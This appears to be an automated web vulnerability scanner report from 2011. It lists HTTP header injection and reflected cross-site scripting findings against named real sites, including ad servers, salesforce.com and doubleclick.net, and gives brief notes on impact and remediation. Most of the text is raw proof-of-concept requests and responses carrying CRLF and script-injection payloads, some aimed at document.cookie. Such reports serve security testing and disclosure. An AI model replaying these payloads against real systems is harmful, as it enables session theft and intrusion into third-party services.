B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 131a5%0d%0ad2c2e010a34 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=131a5%0d%0ad2c2e010a34&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload 46baf%0d%0a393469f66ab was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=0&res=46baf%0d%0a393469f66ab HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 8bddc%0d%0a1cb899d5230 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=8bddc%0d%0a1cb899d5230&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the avc request parameter is copied into the Set-Cookie response header. The payload 2106c%0d%0aeb95574723e was submitted in the avc parameter. This caused a response containing an injected HTTP header.
Request
GET /webtracker/track2.html?method=track&pid=31021&uclkt=1&alh=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&avc=2106c%0d%0aeb95574723e&source=&keyword=&ref=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&pageTitle=Ownership%20Targeting%20%7C%20OwnerIQ&pageUrl=http%3A%2F%2Fwww.owneriq.com%2Fownership-targeting%3Fsrc%3D728x90_blue&java=1&amcs=0.41058127977885306 HTTP/1.1 Host: live.activeconversion.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:44 GMT Server: Apache Pragma: no-cache Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=C1524BDBD48BB3A5968A32D0C1902338; Path=/webtracker Set-Cookie: _wt_31021="1296945354839|2106c eb95574723e|0"; Max-Age=630720000;Path=/; HttpOnly P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM" Connection: close Content-Type: image/png Content-Length: 68
The value of the target request parameter is copied into the Location response header. The payload 7ddb9%0d%0ad1e8da5d420 was submitted in the target parameter. This caused a response containing an injected HTTP header.
Request
GET /track?target=7ddb9%0d%0ad1e8da5d420&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1 Host: mm.chitika.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:58:25 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJSQEuhBljgvx6LisqP2AupJFgK5WemUmSqCRZBWwtlJoLJyYgB+x08rWfR/ShFOalNGTqfmziVraghl7E5uw5btOx1dW574W9FJdg9xGu8SZOgKpaXrz/KeWcoywhRG4MQwBrjR5HTBMUxakdzesJAd4Nllx/eIueA718dgTuI7OkPWLq5kZjUJi1hH8BvBRmtvD9sSaTkItOkMvQBn5y8eB2Gp0MskIHLnRFrJebU/IavRUXhAPea4WfMxpEOwV9DXMgU85wESeHUWmEzFegExxv1n4K/i4nOYKeA6L8d0eyjYfz8uXn3ThKSqF9Iq/lRa8qtkQAJ7UE7txh/8Q3dkebSqNOlEMRNgiDUcLqxp3a5iHCGn6SzZvUvsa4JchhEu05jAodlusGhdyDYZ2FHyz9ji7Dr9CcBp9CFsi6xzuPykQkPYHuRmbnXGF33GtvsL21BOvdvWactKWHYZJoFq3keAnHZZ5ScLOxGWr1lc2oUiObTE5Mitwsa52DBLd/xZxi39hOQ==.cEUs/P3Fg8JIxIN0nB7icA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:25 GMT Location: 7ddb9 d1e8da5d420 Content-Length: 202 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="7ddb9 d1e8da5d420">here</a>.</p> </body></html ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7d788%0d%0a7be81555d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/7d788%0d%0a7be81555d22 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/7d788 7be81555d22/ Date: Sat, 05 Feb 2011 22:09:45 GMT Connection: close Content-Length: 93
The URL has moved to <a href="/servlet/7d788 7be81555d22/">/servlet/7d788 7be81555d22/</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 1b8d9%0d%0af0e07ef42ca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/1b8d9%0d%0af0e07ef42ca HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/1b8d9 f0e07ef42ca/ Date: Sat, 05 Feb 2011 22:10:03 GMT Connection: close Content-Length: 93
The URL has moved to <a href="/servlet/1b8d9 f0e07ef42ca/">/servlet/1b8d9 f0e07ef42ca/</a>
4. Cross-site scripting (reflected)previousnext There are 700 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the ids request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8918"><script>alert(1)</script>cc16b0d36e8 was submitted in the ids parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=9470d8918"><script>alert(1)</script>cc16b0d36e8 HTTP/1.1 Host: a.ligatus.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.2. http://a.ligatus.com/timeout.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.ligatus.com
Path:
/timeout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3a4"><script>alert(1)</script>eb71085dfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /timeout.php?ids=/3b3a4"><script>alert(1)</script>eb71085dfca9470 HTTP/1.1 Host: a.ligatus.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a0e"-alert(1)-"872292d8e2e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2e HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7905 Cache-Control: no-cache Pragma: no-cache Date: Sun, 06 Feb 2011 17:47:22 GMT Expires: Sun, 06 Feb 2011 17:47:22 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=f6a0e"-alert(1)-"872292d8e2ehttp://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2e8'-alert(1)-'f747d321270 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270 HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7905 Cache-Control: no-cache Pragma: no-cache Date: Sun, 06 Feb 2011 17:47:28 GMT Expires: Sun, 06 Feb 2011 17:47:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=7a2e8'-alert(1)-'f747d321270http://www.ibm.com/innovation/de/systemx/intel?cmp=100K3&ct=100K303A&cr=Mittelstandswiki_Rotation&cm=B&csr=neiotde_mm_intel-q12011&ccy=DE&cd=2011-01-06&cn=q1_mm_off_systemxintel_fla_336x280_de&csz=336x ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73258'-alert(1)-'86e7173ff52 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26 ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bca7e"-alert(1)-"230eda09231 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:45:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26 ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b4d"-alert(1)-"63ce073303c was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=;ord=57634238? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 17:46:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 8043
